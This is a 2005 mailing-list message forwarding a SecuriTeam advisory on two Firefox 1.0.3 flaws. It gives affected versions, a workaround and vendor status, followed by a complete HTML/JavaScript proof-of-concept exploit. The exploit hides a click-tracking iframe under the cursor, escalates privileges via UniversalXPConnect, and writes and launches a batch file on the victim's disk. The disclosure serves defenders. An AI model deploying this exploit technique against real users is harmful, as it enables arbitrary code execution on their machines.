[eside-ghost] Fw: [EXPL] Mozilla Firefox Arbitrary Code Execution (Exploit)

txipi txipi en sindominio.net
Mar Mayo 10 19:56:24 CEST 2005 

Aupa!

  El exploit...

Begin forwarded message:

Date: 10 May 2005 13:15:28 +0200
From: SecuriTeam <support en securiteam.com>
To: list en securiteam.com
Subject: [EXPL] Mozilla Firefox Arbitrary Code Execution (Exploit)


The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Mozilla Firefox Arbitrary Code Execution (Exploit)
------------------------------------------------------------------------


SUMMARY

Mozilla Firefox (originally known as Phoenix and briefly as Mozilla 
Firebird) is "a free, cross-platform, graphical web browser developed by

the Mozilla Foundation and hundreds of volunteers".

Two vulnerabilities have been discovered in Firefox, which can be 
exploited by malicious people to run malicious code on vulnerable
systems 
and compromise its integrity.

DETAILS

Vulnerable Systems:
 * Mozilla Firefox version 1.0.3

This proof of concept involve exploiting two flaws:
1) Tricking Firefox into thinking a software installation is being 
triggered by a whitelisted site, using history stored trusted URL.
2) Software installation trigger not sufficiently checking image URLs 
containing JavaScript code.

Workaround:
Disable software installation (Web Features panel of the 
Options/Preferences window in Firefox 1.0.3 or the Content panel in the 
latest trunk builds).

Vendor Status:
The Mozilla Foundation patched (partially) this issue on the server side

by adding random letters and numbers to the install function, which will

prevent this exploit from working. We anticipate that the Mozilla 
Foundation will release a Firefox 1.0.4 update shortly.

Exploit:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
< html>
< head>
< title>Firefox Full Remote Compromise</title>
</head>
< body>
Click anywhere inside this page to compromise your system!<br>
Don't worry. Only a harmless batch file will be run. View the source if 
you dont believe me ;)<br>
Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is 
perfect. Breaking something, or if you're the hacker, building
something, 
only requires patience and a little bit of spare time.<br> <br>
Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a

very nice browser you guys have put together!

< iframe onload="loader()" src="javascript:'< noscript>'+eval('if 
(window.name!=\'stealcookies\')
{ window.name=\'stealcookies\'; } else { event=
{ target:{ href: 
\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0
.5.9.1-fx+mz+tb.xpi\'} };
install(event, \'You are 
vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManage
r.
enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\'); file = 
Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.i
nterfaces.nsILocalFile);
file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream = 
Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\
\\\\'].
createInstance( Components.interfaces.nsIFileOutputStream );
outputStream.init(file,0x04|0x08|0x20,420,0); output=\\\\\\\'@ECHO 
off\\\\\\\\ncls\\\\\\\\n
ECHO If I wasnt so nice, this could have been a virus... 
\\\\\\\\nPAUSE\\\\\\\';
outputStream.write(output,output.length); outputStream.close(); 
file.launch();\\\')\'); }') + '</noscript>< a 
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&
application=firefox\' style=\'cursor:default;\'>   </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0" 
marginheight=0"
style="position:absolute; left:0px; width:0px;height:6px; width:6px; 
margin:0px;
padding:0px; -moz-opacity:0"></iframe>


< script language="JavaScript" type="text/javascript">

document.onmousemove = function trackMouse(e) {
    document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
    document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}

var counter = 0;
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        //targetframe.style.display="none";
    }
}
</script>
</body>
</html>

Bugzilla:
 <https://bugzilla.mozilla.org/show_bug.cgi?id=292691> 
https://bugzilla.mozilla.org/show_bug.cgi?id=292691 (limited access)


ADDITIONAL INFORMATION

The information has been provided by  <mailto:tuytumadre en att.net> 
tuytumadre en att.net.
The original article can be found at:  
<http://greyhatsecurity.org/vulntests/ffrc.htm> 
http://greyhatsecurity.org/vulntests/ffrc.htm



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe en securiteam.com 
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe en securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of
any kind. 
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages. 






-- 
Agur
  txipi

wget -O - http://sindominio.net/~txipi/txipi.gpg.asc | gpg --import
Key fingerprint = CCAF 9676 B049 997A 96D6  4D7C 3529 5545 4375 1BF4

Another war ... must it always be so?  How many comrades have we lost
in this way? ...  Obedience.  Duty.  Death, and more death ...
		-- Romulan Commander, "Balance of Terror", stardate 1709.2

Más información sobre la lista de distribución eside-ghost